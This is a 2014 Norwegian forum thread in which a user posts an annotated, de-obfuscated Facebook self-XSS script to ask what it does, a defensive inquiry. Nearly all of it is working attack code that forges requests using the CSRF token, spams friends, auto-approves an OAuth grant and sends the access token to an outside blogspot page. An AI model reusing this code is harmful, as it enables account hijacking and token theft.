Areyan Skrevet 29. april 2014 Del Skrevet 29. april 2014 (endret) Hei, fikk noen rare forespørsler via facebook om a copy-paste og kjøre koden herfra på facebooken min.Mistenker at det er et hackerforsøk og vil gjerne ha litt hjelp fra folk som er kyndige med javascript til å hjelpe meg å forstå nøyaktig hva denne koden vil gjøre. Og selvfølgelig hvilke konsekvenser det vil ha for en facebook-profil. Setter veldig pris på litt hjelp her da noen av mine mindre datakyndige venner selvfølgelig har gjort som hackeren har instruert og kjørt koden... Har tatt meg bryet med å oversette de kryptiske bitene til koden det skal representere og formatere den til et lesbart nivå som best jeg kan:
// NOTE(review): This is a "paste this into your browser" (self-XSS) script. It runs
// inside the pasting user's own logged-in page, so every request below is sent
// as that user. What the visible code does, in order:
//   1. subscribes the account to four lists (Kodran),
//   2. posts to a group-membership endpoint for four group ids (g),
//   3. fetches the friend list and posts comments that @-mention the friends
//      on the entry whose id is _0xa22c[5] (arkadaslari_al / yorum_yap),
//   4. posts to the group-membership endpoint once more and then adds every
//      friend to that group,
//   5. requests an OAuth token for one app id, auto-submits the confirmation
//      forms, and hands the resulting access token to an external blogspot page,
//   6. blanks several page elements every 200 ms.
// Cleanup implied by the above for anyone who ran it: remove the unknown app
// authorization (that is what invalidates the token from step 5) and review
// group memberships, list subscriptions and recent comments.

// Injects a <script> element whose body sends a request to the friends-list
// subscribe endpoint (action=subscribe) with the given id as `flid`.
// AsyncRequest is not defined in this snippet; it is taken from the host page.
function Kodran(uidss) {
    var a = document.createElement('script');
    a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
    document.body.appendChild(a)
}
// Four list ids are subscribed to.
Kodran("1379575028991328");
Kodran("1379738492308315");
Kodran("562521103826775");
Kodran("262651447224104");
// b: value of the page's hidden `fb_dtsg` form field (Facebook's anti-CSRF token);
// reading it from the DOM is what lets the forged POSTs below be accepted.
// c: the user id. The inner match pulls the digits out of the `c_user` cookie;
// the outer match searches the cookie string for those digits again, so `c` is a
// match array that stringifies to the id when concatenated.
var b = document.getElementsByName("fb_dtsg")[0].value,
    c = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
// POSTs the group id `d` to /ajax/groups/membership/r2j.php together with the
// token and user id. NOTE(review): "r2j" presumably means "request to join" --
// consistent with the group memberships reported further down the thread.
function g(d) {
    var a = new XMLHttpRequest;
    d = "&ref=group_jump_header&group_id=" + d + "&fb_dtsg=" + b + "&__user=" + c + "&phstamp=";
    a.open("POST", "/ajax/groups/membership/r2j.php?__a=1", !0);
    // The handler only reads `a.close` (never calls anything): the response is ignored.
    a.onreadystatechange = function () { 4 == a.readyState && 200 == a.status && a.close };
    a.send(d)
}
// Four group ids are sent to that endpoint.
g("235841983200157");
g("623270711058894");
g("166191003446381");
g("429414337196220");
// Token and user id are read again (same expressions as above).
b = document.getElementsByName("fb_dtsg")[0].value;
c = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
// String table of the obfuscated part: every `_0xa22c[n]` below is a lookup into
// this array (property names, URL fragments, form-field names). The identifiers
// arkadaslar / yorum_yap / mesaj are Turkish for friends / make-comment / message.
var _0xa22c=["value","fb_dtsg","getElementsByName","match","cookie","281001968734667","onreadystatechange","readyState","arkadaslar = ","for (;;","","replace","responseText",";","length","entries","payload","round"," @[","uid",":","text","]"," 
","\x26filter[0]=user","\x26options[0]=friends_only","\x26options[1]=nm","\x26token=v7","\x26viewer=","\x26__user=","https://","indexOf","URL","GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","open","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","send","random","floor","\x26ft_ent_identifier=","\x26comment_text=","\x26source=2","\x26client_id=1377871797138:1707018092","\x26reply_fbid","\x26parent_comment_id","\x26rootid=u_jsonp_2_3","\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:","}","\x26attached_sticker_fbid=0","\x26attached_photo_fbid=0","\x26giftoccasion","\x26ft[tn]=[]","\x26__a=1","\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo","\x26__req=q","\x26fb_dtsg=","\x26ttstamp=","POST","/ajax/ufi/add_comment.php","Content-type","application/x-www-form-urlencoded","setRequestHeader","status","close"];
// De-obfuscated: document.getElementsByName("fb_dtsg")[0].value
var fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];
// De-obfuscated: the same double cookie match for c_user as above.
var user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);
// id = "281001968734667": the entry the comments are posted on.
var id=_0xa22c[5];
var arkadaslar=[];
var svn_rev;
// Fetches the user's friend list from the typeahead endpoint (filter user,
// friends_only, viewer = user id) and, when the response arrives, comments on
// `id` with @-mentions of the friends.
function arkadaslari_al(id) {
    var _0x7892x7= new XMLHttpRequest();
    _0x7892x7[_0xa22c[6]]=function () {
        if(_0x7892x7[_0xa22c[7]]==4) {
            // eval("arkadaslar = " + responseText.replace("for (;;", "") + ";")
            // -- the server response is executed as code to fill `arkadaslar`.
            eval(_0xa22c[8]+_0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9],_0xa22c[10])+_0xa22c[13]);
            // Batches of 27 entries from arkadaslar.payload.entries; the batch
            // count is Math.round(length / 27).
            for(f=0; f<Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]]/27); f++) {
                mesaj=_0xa22c[10];
                mesaj_text=_0xa22c[10];
                for(i=f*27; i<(f+1)*27; i++) {
                    if(arkadaslar[_0xa22c[16]][_0xa22c[15]][i]) {
                        // Appends " @[uid:text]" for this friend (a mention).
                        mesaj+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]+_0xa22c[22];
                        // mesaj_text is built but never used in the visible code.
                        mesaj_text+=_0xa22c[23]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];
                    } ;
                } ;
                // One comment per batch.
                yorum_yap(id,mesaj);
            } ;
        } ;
    } ;
    // Query string: &filter[0]=user&options[0]=friends_only&options[1]=nm&token=v7&viewer=<id>&__user=<id>
    var _0x7892x8=_0xa22c[24];
    _0x7892x8+=_0xa22c[25];
    _0x7892x8+=_0xa22c[26];
    _0x7892x8+=_0xa22c[27];
    _0x7892x8+=_0xa22c[28]+user_id;
    _0x7892x8+=_0xa22c[29]+user_id;
    // Uses the https or the http form of the endpoint to match document.URL.
    if(document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30])>=0) {
        _0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[34]+_0x7892x8,true);
    } else {
        _0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[36]+_0x7892x8,true);
    } ;
    _0x7892x7[_0xa22c[37]]();
} ;
// Builds a string of nine " @[uid:text]" mentions. The uid and the text are
// picked with two independent random indices. Not called anywhere in the code
// visible here.
function RandomArkadas() {
    var _0x7892xa=_0xa22c[10];
    for(i=0; i<9; i++) {
        _0x7892xa+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]]+_0xa22c[22];
    } ;
    return _0x7892xa;
} ;
// POSTs a comment to /ajax/ufi/add_comment.php: ft_ent_identifier = id,
// comment_text = the URL-encoded mention string, plus fixed form fields, the
// user id and the fb_dtsg token.
function yorum_yap(id,_0x7892xc) {
    var _0x7892xd= new XMLHttpRequest();
    var _0x7892x8=_0xa22c[10];
    _0x7892x8+=_0xa22c[40]+id;
    _0x7892x8+=_0xa22c[41]+encodeURIComponent(_0x7892xc);
    _0x7892x8+=_0xa22c[42];
    _0x7892x8+=_0xa22c[43];
    _0x7892x8+=_0xa22c[44];
    _0x7892x8+=_0xa22c[45];
    _0x7892x8+=_0xa22c[46];
    _0x7892x8+=_0xa22c[47]+id+_0xa22c[48];
    _0x7892x8+=_0xa22c[49];
    _0x7892x8+=_0xa22c[50];
    _0x7892x8+=_0xa22c[51];
    _0x7892x8+=_0xa22c[52];
    _0x7892x8+=_0xa22c[29]+user_id;
    _0x7892x8+=_0xa22c[53];
    _0x7892x8+=_0xa22c[54];
    _0x7892x8+=_0xa22c[55];
    _0x7892x8+=_0xa22c[56]+fb_dtsg;
    _0x7892x8+=_0xa22c[57];
    _0x7892xd[_0xa22c[35]](_0xa22c[58],_0xa22c[59],true);
    _0x7892xd[_0xa22c[62]](_0xa22c[60],_0xa22c[61]);
    _0x7892xd[_0xa22c[6]]=function () {
        if(_0x7892xd[_0xa22c[7]]==4&&_0x7892xd[_0xa22c[63]]==200) {
            // Bare property read of "close": does nothing, the response is ignored.
            _0x7892xd[_0xa22c[64]];
        } ;
    } ;
    _0x7892xd[_0xa22c[37]](_0x7892x8);
} ;
// Starts the friend-list fetch and the mention comments.
arkadaslari_al(id);
// Second group block: one group id (also in the g() calls above) is sent to the
// same r2j.php membership endpoint.
var gid = ['623270711058894'];
var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
var httpwp = new XMLHttpRequest();
var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
httpwp['open']('POST', urlwp, true);
httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
httpwp['setRequestHeader']('Content-length', paramswp['length']);
httpwp['setRequestHeader']('Connection', 'keep-alive');
httpwp['send'](paramswp);
var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
var friends = new Array();
// Synchronous GET (third argument false) of the friend list.
gf = new XMLHttpRequest();
gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
gf['send']();
if (gf['readyState'] != 4) {} else {
    // Drops the first 9 characters of the response and evals the rest as an
    // object literal -- again executing server-supplied text.
    data = eval('(' + gf['responseText']['substr'](9) + ')');
    if (data['error']) {} else {
        // friends = payload.entries sorted by their `index` field.
        friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) {
            return _0x93dax8['index'] - _0x93dax9['index'];
        });
    };
};
// One POST per friend to /ajax/groups/members/add_post.php with members=<friend uid>
// and group_id=gid: every friend is added to the group. The response is ignored.
for (var i = 0; i < friends['length']; i++) {
    var httpwp = new XMLHttpRequest();
    var urlwp = '/ajax/groups/members/add_post.php?__a=1';
    var paramswp= '&fb_dtsg=' + fb_dtsg + '&group_id=' + gid + '&source=typeahead&ref=&message_id=&members=' + friends[i]['uid'] + '&__user=' + user_id + '&phstamp=';
    httpwp['open']('POST', urlwp, true);
    httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
    httpwp['setRequestHeader']('Content-length', paramswp['length']);
    httpwp['setRequestHeader']('Connection', 'keep-alive');
    httpwp['onreadystatechange'] = function () {
        if (httpwp['readyState'] == 4 && httpwp['status'] == 200) {};
    };
    httpwp['send'](paramswp);
};
// Token-theft block. indexOf only searches for its first argument, so the
// effective condition is "hostname contains www.facebook.com"; the other three
// strings are not searched for.
if (location.hostname.indexOf("www.facebook.com", "static.ak.facebook.com", "apps.facebook.com", "beta.facebook.com") >= 0) {
    var profile_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]).toString();
    // GETs `url`, parses the response into a detached <html> element and, if it
    // contains a form, passes the first form and its action URL on to
    // duzenlevegonder. (Name is Turkish, roughly "grant app permission".)
    function uygulamaizinver(url) {
        var xmlhttp = new XMLHttpRequest();
        xmlhttp.onreadystatechange = function () {
            if (xmlhttp.readyState == 4) {
                izikbenhtml = document.createElement("html");
                izikbenhtml.innerHTML = xmlhttp.responseText;
                if (izikbenhtml.getElementsByTagName("form").length > 0) {
                    izikbenhtml.innerHTML = izikbenhtml.getElementsByTagName("form")[0].outerHTML
                    act = izikbenhtml.getElementsByTagName("form")[0].action;
                    duzenlevegonder(izikbenhtml, act);
                }
            }
        };
        xmlhttp.open("GET", url, true);
        xmlhttp.send();
    }
    // Submits the form on the user's behalf: copies every <input> name/value
    // except those named __CANCEL__ (and those whose name starts with
    // "cancel_clicked"), adds __CONFIRM__=1 and POSTs to the form's action.
    // If the response contains another form it repeats; otherwise it looks for
    // "#access_token=...&expires_in" in the response and passes the token to
    // tokenyolla. The user never sees or clicks the dialog.
    function duzenlevegonder(formnesne, act) {
        izikbenparams = "";
        for (i = 0; i < formnesne.getElementsByTagName("input").length; i++) {
            if (formnesne.getElementsByTagName("input")[i].name.indexOf("__CANCEL__") < 0 && formnesne.getElementsByTagName("input")[i].name.indexOf("cancel_clicked")) {
                izikbenparams += "&" + formnesne.getElementsByTagName("input")[i].name + "=" + formnesne.getElementsByTagName("input")[i].value;
            }
        }
        // Forces the first <select> to the value 80.
        // NOTE(review): presumably the dialog's audience selector -- confirm.
        if (formnesne.getElementsByTagName("select").length > 0) {
            izikbenparams += "&" + formnesne.getElementsByTagName("select")[0].name + "=80";
        }
        // Result of replace() is discarded, so this line has no effect.
        izikbenparams.replace("&fb_dtsg", "fb_dtsg");
        izikbenparams += "&__CONFIRM__=1";
        formnesne = formnesne;
        var xmlhttp = new XMLHttpRequest();
        xmlhttp.onreadystatechange = function () {
            if (xmlhttp.readyState == 4) {
                izikhtml = document.createElement("html");
                izikhtml.innerHTML = xmlhttp.responseText;
                if (izikhtml.getElementsByTagName("form").length > 0) {
                    izikhtml.innerHTML = izikhtml.getElementsByTagName("form")[0].outerHTML;
                    act = izikhtml.getElementsByTagName("form")[0].action;
                    duzenlevegonder(izikhtml, act)
                } else {
                    sex = xmlhttp.responseText.match(/#access_token=(.*?)&expires_in/i);
                    if (sex[1]) {
                        tokenyolla(sex[1]);
                    }
                }
            }
        };
        xmlhttp.open("POST", act, true);
        xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        xmlhttp.send(izikbenparams);
    }
    // Builds the OAuth dialog URL for app `id` with response_type=token and the
    // scopes email, publish_stream, user_likes, friends_likes, user_birthday --
    // i.e. the token requested includes permission to publish as the user.
    function TokenUrl(id) {
        return "//www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=" + id + "&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday";
    }
    // Runs when no 'token_<id>' entry exists in localStorage. `tarih` is not
    // defined anywhere in the visible code, so the second branch would throw if
    // it were ever evaluated.
    if (!localStorage['token_' + profile_id] || (localStorage['token_' + profile_id] && tarih.getTime() >= localStorage['token_' + profile_id])) {
        // Requests a token for app id 121876164619130 and auto-confirms it.
        uygulamaizinver(TokenUrl("121876164619130"));
        // Synchronous Graph lookup of the user's name; `isim` is not used in the
        // visible code.
        var http = new XMLHttpRequest();
        http['open']('GET', 'http://graph.facebook.com/' + profile_id, false);
        http['send']();
        var get = JSON.parse(http['responseText']);
        var isim = get.name;
    }
    // Every 200 ms, empties all elements with class "_5ce", "uiToggle wrap" and
    // "uiPopover". NOTE(review): presumably menus/popovers, which would make it
    // harder to undo the actions from the same page -- cannot be confirmed from
    // the code alone.
    window.setInterval(function () {
        if (document.getElementsByClassName("_5ce")) {
            for (i = 0; i < document.getElementsByClassName("_5ce").length; i++) {
                document.getElementsByClassName("_5ce")[i].innerHTML = "";
            }
        }
        if (document.getElementsByClassName("uiToggle wrap")) {
            for (i = 0; i < document.getElementsByClassName("uiToggle wrap").length; i++) {
                document.getElementsByClassName("uiToggle wrap")[i].innerHTML = "";
            }
        }
        if (document.getElementsByClassName("uiPopover")) {
            for (i = 0; i < document.getElementsByClassName("uiPopover").length; i++) {
                document.getElementsByClassName("uiPopover")[i].innerHTML = "";
            }
        }
    }, 200);
    // Navigates the top window to an external blogspot page with the access
    // token appended as the URL fragment: this is where the token leaves the
    // user's control.
    function tokenyolla(token) {
        top.location.href = 'http://19283746564.blogspot.com/#' + token;
    }
}
// Decoy message shown to the user; it has no function beyond the alert.
var Zakarias = "click OK and wait for seconds, Hacking START now!! ";
alert(Zakarias);
Endret 29. april 2014 av Areyan Lenke til kommentar
War Skrevet 29. april 2014 Del Skrevet 29. april 2014 Er det dette? http://www.scamsniper.info/2011/04/warning-cut-and-paste-java-code-leads.html Lenke til kommentar
Areyan Skrevet 29. april 2014 Forfatter Del Skrevet 29. april 2014 Nei, tror ikke det. Men framgangsmetoden ligner, bortsett fra at man her blir randomly tatt opp i grupper som virker nokså suspekte, via venner som har kjørt koden ovenfor. Lenke til kommentar